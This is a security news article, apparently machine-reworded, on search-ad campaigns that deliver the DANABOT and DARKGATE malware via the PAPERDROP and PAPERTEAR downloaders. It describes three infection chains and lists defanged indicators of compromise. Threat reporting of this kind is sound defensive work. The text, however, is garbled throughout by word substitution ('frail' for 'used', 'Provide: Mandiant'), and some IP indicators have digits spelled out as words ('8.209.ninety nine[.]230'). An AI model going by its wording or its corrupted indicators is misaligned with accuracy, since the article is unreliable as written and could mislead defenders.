Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares

by Esmeralda McKenzie
Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares

Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares

Hackers Abusing search engine Ads to Bring DANABOT & DARKGATE Malwares

Threat actors are shopping adverts for malicious internet sites to lure victims into downloading malware, which is fascinating to finally lead to files theft and ransomware.

This intention became as soon as frail in a lot of advert platforms, including search engine adverts and social media adverts, as they give a broad fluctuate of controls esteem explicit audiences, geographic areas, IP take care of ranges, taking a gaze history, and instrument sorts.

Search Engine Ads Bring Malware

Per the reports shared with Cyber Safety News, there were four diversified malware households noticed right by the investigation of those malicious advert campaigns, which were,

  • PAPERDROP – VBScript-based downloader that communicates with HTTPS and likewise downloads and executes DANABOT.
  • PAPERTEAR – VBScript-based downloader noticed to enumerate the checklist of local processes.
  • DANABOT – Backdoor written in Delphi that uses personalized binary protocol over TCP.
  • DARKGATE – Backdoor written in Delphi that is succesful of taking pictures keystrokes, executing instructions, file switch, and credential theft.

To boot to this three diversified provide chains were noticed in two of them frail a renamed version of cURL binary.

An infection Chain #1: PAPERDROP > DANABOT

In this an infection chain, the wscript.exe assignment is frail to initial a DNS query which then executes the Windows installer utility msiexec.exe and installs an software. Furthermore, it uses the rundll32.exe assignment to load the dropper DLL and executes the “initiate” characteristic to initiate the DANABOT payload.

An infection Chain
An infection Chain #1 (Provide: Mandiant)

An infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE

In this 2d an infection chain, the PAPERTEAR downloader initiates an HTTP POST query to infocatalog[.]pics over port 8080. After this, the wscript.exe executes the one-liner present that finally drops the DARKGATE malware onto the victim’s diagram.

An infection Chain #2
An infection Chain #2 (Provide: Mandiant)

An infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT

The third execution chain is equal to the 2d one nonetheless here the PAPERDROP downloader executes one other extended one-liner that uses the renamed curl.exe binary for downloading and installing a malicious package file which drops the DANABOT malware.

An infection Chain #3
An infection Chain #3 (Provide: Mandiant)

Furthermore, a whole fable has been revealed which provides detailed files regarding the malware capabilities, execution strategies, chains, and diversified files.

Indicators of Compromise

Form Value Campaign Malware Family Attribution
Domain www.claimprocessing[.]org 23-046 UNC2975
Domain www.treasurydept[.]org 23-046 UNC2975
Domain www.assetfinder[.]org 23-046 UNC2975
Domain gfind[.]org 23-046 UNC2975
Domain claimunclaimed[.]org 23-046 UNC2975
Domain treasurydept[.]org 23-046 UNC2975
Domain www.myunclaimedcash[.]org 23-046 UNC2975
Domain freelookup[.]org 23-046 UNC2975
Domain capitalfinders[.]org 23-046 UNC2975
Domain plano.soulcarelife[.]org 23-046 PAPERDROP UNC2975
Domain pittsburgh.soulcarelife[.]org 23-046 PAPERDROP UNC2975
Domain durham.soulcarelife[.]org 23-046 PAPERDROP UNC2975
Domain mesa.halibut[.]sbs 23-046 PAPERDROP UNC2975
Domain arlington.barracudas[.]sbs 23-046 PAPERDROP UNC2975
Domain lugbara[.]top 23-046 PAPERDROP UNC2975
Domain lewru[.]top 23-046 PAPERDROP UNC2975
Domain infocatalog[.]pics 23-046 DARKGATE UNC5085
Domain bikeontop[.]shop 23-046 DARKGATE UNC5085
Domain positivereview[.]cloud 23-046 DARKGATE UNC5085
Domain dreamteamup[.]shop 23-046 DARKGATE UNC5085
Domain whatup[.]cloud 23-046 DARKGATE UNC5085
Domain thebesttime[.]buzz 23-046 DARKGATE UNC5085
IP Address 47.253.165[.]1 23-046 UNC2975
IP Address 8.209.ninety nine[.]230 23-046 UNC2975
IP Address 47.252.forty five[.]173 23-046 UNC2975
IP Address 47.252.33[.]131 23-046 UNC2975
IP Address 47.253.141[.]12 23-046 UNC2975
IP Address 47.252.forty five[.]173 23-046 UNC2975
IP Address 34.16.181[.]0 23-046 DANABOT
IP Address 35.247.194[.]72 23-046 DANABOT
IP Address 35.203.111[.]228 23-046 DANABOT
IP Address 94.228[.]169[.]143 23-051 PAPERTEAR UNC5085
MD5 9f9c5a1269667171e1ac328f7f7f6cb3 23-046 DARKGATE UNC5085
MD5 2c16eafd0023ea5cb8e9537da442047e 23-046 PAPERDROP (Form I) UNC2975
MD5 7544f5bb88ad481f720a9d9f94d95b30 23-046 PAPERDROP(Form I) UNC2975
MD5 862a42a91b5734062d47c37fdd80c633 PAPERDROP(Form II) UNC2956
MD5 650b0b12b21e9664d5c771d78738cf9f PAPERTEAR UNC5085
MD5 9120c82b0920b9db39894107b5494ccd 23-051 PAPERTEAR UNC5085
Provide: Mandiant

Source credit : cybersecuritynews.com

Related Posts